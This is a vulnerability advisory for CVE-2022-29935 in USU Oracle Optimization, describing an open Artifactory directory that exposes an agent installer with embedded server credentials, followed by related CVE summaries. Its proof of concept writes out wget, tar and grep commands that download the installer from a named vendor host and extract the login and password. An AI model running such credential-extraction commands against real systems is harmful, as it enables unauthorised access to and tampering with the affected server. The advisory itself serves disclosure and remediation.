Headline
CVE-2022-29935: Build software better, together
USU Oracle Optimization before 5.17.5 allows attackers to discover the quantum credentials via an agent-installer download. NOTE: this is not an Oracle Corporation product.
Package
Oracle optimization ( )
Affected versions
20210817
Overview
Artifactory: Directory listing & No access control
Impact
- Send malicious payload to compromise main server
- Inject fake/erroneous data to alter collect results
Details
Directory listing is enabled and no access control is implemented on https://poc-oracle.sam.usu.com/artifactory/
Anyone can download agent installer and retrieve embedded secrets (quantum user login/password) to authenticate to main server (with privileges to push collected data).
Proof of Concept
This proof of concept demonstrate the possibility to retreive quantum credentials without any permission on platform.
Download agent installer:
$ wget https://poc-oracle.sam.usu.com/artifactory/smartcollect-release/fr/usu/smartcollect/smartcollector-installer/5.16.2/smartcollector-installer-5.16.2-linux-x64.tgz
Exctract smartcollector.properties:
$ tar xzf smartcollector-installer-5.16.2-linux-x64.tgz smartcollector-installer/smartcollector.properties
Extract credentials from agent configuration:
grep -B 1 "^SMARTCOLLECT_" smartcollector-installer/smartcollector.properties
Solution****Security patch
Upgrade to version 5.17.5
Workaround
We recommand to:
- Implement access control based on authentication & authorization.
- Disable directory listing
References
ITDEVLC4O-2965 - Prevent artifactory directory listing
Credits
Orange CERT-CC
Frederic BONE at Orange group
Timeline
Date reported: September 29, 2021
Date fixed: November 24, 2021
Related news
A misconfiguration of RSA in PingID Android app prior to 1.19 is vulnerable to pre-computed dictionary attacks, leading to an offline MFA bypass when using PingID Windows Login.
A misconfiguration of RSA in PingID iOS app prior to 1.19 is vulnerable to pre-computed dictionary attacks, leading to an offline MFA bypass when using PingID Windows Login.
NVIDIA Omniverse Nucleus and Cache contain a vulnerability in its configuration of OpenSSL, where an attacker with physical access to the system can cause arbitrary code execution which can impact confidentiality, integrity, and availability.
This scale of this month's encrypted DDoS attack over HTTPS suggests a well-resourced operation, analysts say.
Improper handling of Length parameter in GitHub repository erudika/scoold prior to 1.49.4. When the text size is large enough the service results in a momentary outage in a production environment. That can lead to memory corruption on the server.
Multiple (13x) Cross-Site Request Forgery (CSRF) vulnerabilities in WPKube's Subscribe To Comments Reloaded plugin <= 211130 on WordPress allows attackers to clean up Log archive, download system info file, plugin system settings, plugin options settings, generate a new key, reset all options, change notifications settings, management page settings, comment form settings, manage subscriptions > mass update settings, manage subscriptions > add a new subscription, update subscription, delete Subscription.
Small HTTP Server version 3.06 suffers from a remote buffer overflow vulnerability via long GET request.
Cross-Site Request Forgery (CSRF) leading to Arbitrary File Upload vulnerability in Rara One Click Demo Import plugin <= 1.2.9 on WordPress allows attackers to trick logged-in admin users into uploading dangerous files into /wp-content/uploads/ directory.
A flaw was found in the QXL display device emulation in QEMU. An integer overflow in the cursor_alloc() function can lead to the allocation of a small cursor object followed by a subsequent heap-based buffer overflow. This flaw allows a malicious privileged guest user to crash the QEMU process on the host or potentially execute arbitrary code within the context of the QEMU process.
A flaw was found in the QXL display device emulation in QEMU. A double fetch of guest controlled values `cursor->header.width` and `cursor->header.height` can lead to the allocation of a small cursor object followed by a subsequent heap-based buffer overflow. A malicious privileged guest user could use this flaw to crash the QEMU process on the host or potentially execute arbitrary code within the context of the QEMU process.
Users with the capability to configure badge criteria (teachers and managers by default) were able to configure course badges with profile field criteria, which should only be available for site badges.
USU Oracle Optimization before 5.17.5 lacks Polkit authentication, which allows smartcollector users to achieve root access via pkexec. NOTE: this is not an Oracle Corporation product.
USU Oracle Optimization before 5.17 allows authenticated quantum users to achieve remote code execution because of /v2/quantum/save-data-upload-big-file Java deserialization. NOTE: this is not an Oracle Corporation product.